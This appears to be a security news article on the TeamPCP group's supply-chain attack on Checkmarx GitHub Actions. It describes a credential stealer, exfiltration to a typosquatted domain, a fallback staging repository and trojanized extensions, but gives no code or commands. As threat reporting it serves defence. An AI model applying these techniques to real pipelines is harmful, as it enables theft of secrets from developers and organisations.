Security researchers have reported that the cloud-native cybercriminal group TeamPCP has expanded its supply chain operations by targeting Checkmarx GitHub Actions workflows. This latest activity follows their notorious compromise of the Trivy vulnerability scanner and associated GitHub Actions.
The compromised workflows include:
How the Attack Works
According to cloud security firm Sysdig, the attackers used a credential-stealing payload similar to the one deployed in the Trivy supply chain attack. The operation appears linked to CVE-2026-33634, a high-severity vulnerability exploited in March 2026.
The malware, dubbed TeamPCP Cloud Stealer, targets CI/CD secrets, cloud credentials (AWS, Google Cloud, Azure), SSH keys, Git tokens, .env files, database credentials, Slack and Discord webhooks, and cryptocurrency wallets. It also collects configuration data from the CI/CD environment.
Techniques and Fallback Mechanisms
The attackers force-pushed malicious commits containing setup.sh to inject the stealer. Stolen data is exfiltrated to checkmarx[.]zone in an encrypted archive (tpcp.tar.gz). As a fallback, the malware creates a repository named docs-tpcp using the victim’s GitHub token to stage stolen data if the primary exfiltration fails.
Sysdig highlighted that typosquatted vendor domains were deliberately used to hide malicious traffic, reducing the chance of detection during log analysis.
Escalation and Cross-Repository Compromise
The stealer can extract GitHub personal access tokens from CI runner memory. If tokens have write access to other repositories using Checkmarx actions, attackers can propagate malicious code to additional workflows, creating a cascading supply chain compromise.
The attack reportedly involved the compromise of the cx-plugins-releases service account and trojanized Open VSX extensions (ast-results 2.53.0 and cx-dev-assist 1.7.0). Once activated, the malware detects cloud credentials and retrieves a next-stage payload from the same domain.
Found this article interesting? Follow us on X (Twitter) , Facebook, Blue sky and LinkedIn to read more exclusive content we post.
